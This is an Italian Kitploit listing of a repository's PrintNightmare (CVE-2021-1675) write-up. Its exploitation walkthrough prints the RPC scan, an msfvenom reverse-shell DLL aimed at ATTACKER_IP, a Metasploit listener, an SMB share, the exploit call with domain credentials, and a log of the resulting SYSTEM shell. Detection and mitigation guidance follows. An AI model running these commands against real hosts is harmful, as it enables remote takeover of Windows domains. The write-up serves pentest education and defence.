Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — Rapporto tecnico e analisi di PrintNightmare (CVE-2021-1675 / CVE-2021-34527), che copre lo sfruttamento RCE/LPE, il rilevamento tramite i log eventi di Windows e la mitigazione per Print Spooler. | Kitploit
Strumenti/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitPenetration TestingPaper e RicercaApprendimento e FormazioneRisposta agli IncidentiAnalisi dei Log

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

Rapporto tecnico e analisi di PrintNightmare (CVE-2021-1675 / CVE-2021-34527), che copre lo sfruttamento RCE/LPE, il rilevamento tramite i log eventi di Windows e la mitigazione per Print Spooler.

Vedi Repository
522 giorni faNon ancora revisionato

Ricerca di vulnerabilità: Privilege Escalation locale e RCE tramite Windows Print Spooler (PrintNightmare / CVE-2021-1675)

Il repository contiene un report tecnico dettagliato (Write-up) e l'analisi del concetto di sfruttamento di una vulnerabilità critica nel servizio di gestione stampa di Windows (Print Spooler), che consente a un utente di dominio con privilegi bassi di eseguire codice arbitrario da remoto con i massimi privilegi di sistema.

🛑 WARNING & DISCLAIMER: Questo materiale è stato preparato esclusivamente a scopo educativo e per lo svolgimento di audit di sicurezza legittimi (Pentest). L'utilizzo delle tecniche descritte contro sistemi senza il preventivo consenso scritto dei proprietari è perseguibile per legge.


📌 Attualità e contesto della ricerca

Le vulnerabilità della famiglia PrintNightmare rappresentano una minaccia critica per gli ambienti aziendali basati su Windows Server e Active Directory. Il difetto architetturale nella verifica dei permessi nelle interfacce RPC MS-RPRN (Print System Remote Protocol) e MS-PAR (Print System Asynchronous Remote Protocol) consente di richiedere legittimamente l'installazione di driver di stampa su un server remoto.

Il pericolo principale risiede nel fatto che, per impostazione predefinita, il servizio di gestione stampa (spoolsv.exe) è attivo sulla maggior parte dei server, inclusi i controller di dominio (Domain Controllers), e opera nel contesto dei privilegi più elevati NT AUTHORITY\SYSTEM. Il compromesso di un singolo account con privilegi bassi (ad esempio tramite phishing) consente all'attaccante di ottenere immediatamente il controllo completo sull'intera infrastruttura Active Directory.


🏗 Architettura della ricerca e stack

  • Obiettivo: Ottenere il controllo di un host Windows remoto tramite le interfacce RPC di stampa.
  • Vettore di attacco: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges.
  • Strumenti: impacket (rpcdump, smbserver), msfvenom, Metasploit Framework, exploit Python.

📈 Svolgimento pratico dello sfruttamento

Passo 1. Ricognizione e raccolta delle credenziali (Reconnaissance)

Per realizzare il vettore di esecuzione remota di codice (RCE) sono necessarie credenziali di dominio valide di un utente con privilegi minimi (fornite nelle condizioni della ricerca).

  • Audit di base del servizio: Il servizio Print Spooler (spoolsv.exe) sulla macchina Windows target è attivo e funziona con i massimi privilegi SYSTEM, il che apre una possibilità diretta di escalation locale dei privilegi (LPE) sull'host attraverso il caricamento di una libreria non fidata.

Passo 2. Scansione delle interfacce RPC (Scanning)

Prima di lanciare l'exploit principale, è necessario assicurarsi che la macchina remota esponga i protocolli di stampa vulnerabili e sia aperta all'interazione di rete. Eseguiamo un sondaggio delle interfacce RPC del sistema target:

root@kitploit:~
impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

Output di terminale controllato:

root@kitploit:~
Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • Insight della fase: L'host target ha restituito correttamente le stringhe dei protocolli [MS-RPRN] e [MS-PAR]. Ciò conferma al 100% che il sistema supporta le interfacce di stampa remota necessarie ed è vulnerabile al vettore PrintNightmare.

Passo 3. Preparazione del payload e dell'infrastruttura (Weaponization)

1. Generazione di una DLL dannosa con reverse shell:

Creiamo un payload per architettura x64, specificando l'indirizzo IP della nostra macchina attaccante per la connessione di rete inversa:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. Avvio del listener in background in Metasploit:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. Distribuzione di una condivisione SMB locale:

Il server Windows target deve avere una possibilità legittima di scaricare la nostra DLL dalla rete senza utilizzare utilità di terze parti. Avviamo un server SMB con supporto al protocollo SMBv2 dalla cartella /tmp:

root@kitploit:~
sudo impacket-smbserver tmp /tmp -smb2support

Passo 4. Sfruttamento e compromissione del sistema (Exploitation)

Eseguiamo lo script Python dell'exploit, fornendogli le credenziali di dominio dell'utente con privilegi bassi e il percorso UNC alla libreria dannosa sulla nostra condivisione SMB locale:

root@kitploit:~
python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

Log dell'intercettazione della sessione riuscita (Metasploit):

root@kitploit:~
[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) Microsoft Corporation. Tutti i diritti riservati.

C:\Windows\system32> whoami
nt authority\system
  • Risultato: Dopo l'invocazione dell'exploit, il servizio di stampa remoto ha caricato con successo il driver dannoso dalla cartella di rete. In Metasploit si è aperta una sessione Meterpreter con lo stato dei massimi privilegi NT AUTHORITY\SYSTEM. L'obiettivo è completamente compromesso.

🔍 Indicatori di compromissione e rilevamento (Detection)

Per i professionisti Blue Team, il rilevamento dello sfruttamento di PrintNightmare si basa sull'audit dei log di sistema Windows e sul monitoraggio di attività anomale dei processi.

1. Monitoraggio degli eventi Windows (Event Logs)

L'avvio riuscito dell'exploit lascia registrazioni caratteristiche nei log di stampa e nei log di sistema:

  • Event ID 808 (PrintService): Registrazione di un errore o di un caricamento atipico di un modulo di stampa. Consente di visualizzare il nome della DLL di terze parti caricata (ad esempio, da percorsi C:\Windows\System32\spool\drivers\x64\3\).
  • Event ID 7031 (System): Riavvio forzato e improvviso del servizio di gestione stampa (Print Spooler), causato dal funzionamento instabile dell'exploit.

2. Comportamento dei processi (EDR / Sysmon)

  • Attività anomala dei processi figli: Comparsa di processi della riga di comando (cmd.exe, powershell.exe) o di utility di raccolta dati il cui processo padre è il processo di sistema del gestore stampa spoolsv.exe. In condizioni legittime, spoolsv.exe non genera mai shell di comando.
  • Attività di rete: Stabilimento di connessioni di rete in uscita dal processo spoolsv.exe verso risorse SMB esterne (porta 445) per scaricare file di driver.

🛡 Raccomandazioni per la mitigazione della vulnerabilità (Mitigation)

  1. Disattivazione completa del servizio (Raccomandato): Se il server non svolge funzioni di stampa (specialmente sui Controller di Dominio), il servizio Print Spooler deve essere completamente disattivato e impostato in modalità Disabled.
  2. Limitazione della stampa remota: Disattivazione della possibilità di stampa remota tramite Criteri di gruppo (GPO):
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled).
  3. Installazione degli aggiornamenti: Applicazione tempestiva degli aggiornamenti di sicurezza ufficiali Microsoft (KB) per chiudere le vulnerabilità di esecuzione remota di codice nel sottosistema di stampa.

🔗 Link utili e materiali

  • Database CVE: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • Articoli analitici: Microsoft Security Update Advisory
Scarica lo strumento